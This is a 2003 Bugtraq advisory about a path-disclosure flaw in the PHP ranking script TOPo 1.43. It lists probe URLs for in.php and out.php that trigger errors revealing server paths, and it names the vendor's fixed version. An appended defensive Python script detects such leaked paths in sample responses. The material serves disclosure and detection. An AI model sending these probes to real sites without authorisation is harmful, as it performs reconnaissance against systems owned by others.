Bugtraq mailing list archives

TOPo 1.43 and prior - Path Disclosure (in.php, out.php)


From: Rynho Zeros Web <hackargentino () gmx net>
Date: Tue, 4 Feb 2003 23:23:29 +0100 (MET)

+ Product:
TOPo.

TOPo is a free TOP system written in PHP that works without a MySQL database.
TOPo is specially designed for web sites hosted on web servers that do not
offer quality MySQL support.

More info:
http://ej3scripts.loadedweb.com/modules.php?name=Info_Scripts&file=index&func=topo

+ Web Site:
http://www.eejj33.tk/

+ Version:
1.43 and prior

+ Bug:
TOPo 1.43 and prior - Path Disclosure (in.php, out.php)

+ Exploit:
http://host/[top_path]/in.php?
http://host/[top_path]/out.php?
http://host/[top_path]/in.php?id=any_word
http://host/[top_path]/out.php?id=any_word
http://host/[top_path]/in.php?any_word
http://host/[top_path]/out.php?any_word

The failure occurs when the script tries to open the file named after the
parameter that we pass to it. When that file does not exist, the error shown
on screen also reveals the script's path on the server.

+ Solution:
Install version 2.0.090, which is free of this error according to its
creator.

Download latest version:
http://ej3scripts.loadedweb.com/modules.php?name=Downloads&d_op=viewdownloaddetails&lid=12&title=EJ3_TOPo_v2.0.090

-- 
XyBØrG
WebMaster de:
www.RZWEB.com.ar
Powered By Dattatec.Com
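
A defender-side check for the condition described in the advisory, added here as an example and not part of the original message: it scans captured response bodies for PHP error text that reveals a filesystem path. The host name, server paths, data file name and response bodies are constructed samples.

```python
import html
import re

# PHP prints errors as "<level>: <message> in <file> on line <N>", optionally
# wrapped in <b> tags when html_errors is enabled. Only absolute paths count.
PHP_ERROR = re.compile(
    r"(?P<level>Warning|Notice|Fatal error|Parse error)\s*(?:</b>)?\s*:"
    r"[^\r\n]*?\s+in\s+(?:<b>)?"
    r"(?P<path>(?:/|[A-Za-z]:[\\/])[^<\r\n]*?)(?:</b>)?"
    r"\s+on\s+line\s+(?:<b>)?(?P<line>\d+)",
    re.IGNORECASE,
)

def find_path_disclosures(body):
    """Return (level, path, line) for each PHP error in body that leaks a path."""
    return [
        (m["level"].capitalize(), html.unescape(m["path"]).strip(), int(m["line"]))
        for m in PHP_ERROR.finditer(body)
    ]

def audit(responses):
    """Map URL -> findings for every response that discloses a path."""
    report = {}
    for url, body in responses.items():
        findings = find_path_disclosures(body)
        if findings:
            report[url] = findings
    return report

# Constructed sample responses (not captured from a real server).
SAMPLES = {
    "http://www.example.test/topo/in.php?id=any_word":
        '<br />\n<b>Warning</b>:  fopen(&quot;data/any_word.dat&quot;, &quot;r&quot;)'
        ' - No such file or directory in <b>/home/site/public_html/topo/in.php</b>'
        ' on line <b>12</b><br />',
    "http://www.example.test/topo/out.php?id=any_word":
        'Warning: fopen(data/any_word.dat): failed to open stream: '
        'No such file or directory in /var/www/topo/out.php on line 9',
    "http://www.example.test/topo/index.php":
        '<html><body>Warning: this site is in beta.</body></html>',
}

if __name__ == "__main__":
    for url, findings in audit(SAMPLES).items():
        for level, path, line in findings:
            print(f"{url}: {level} discloses {path} (line {line})")
```

A finding means the server is still rendering PHP errors to visitors; the upgrade named in the Solution section addresses these two scripts.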
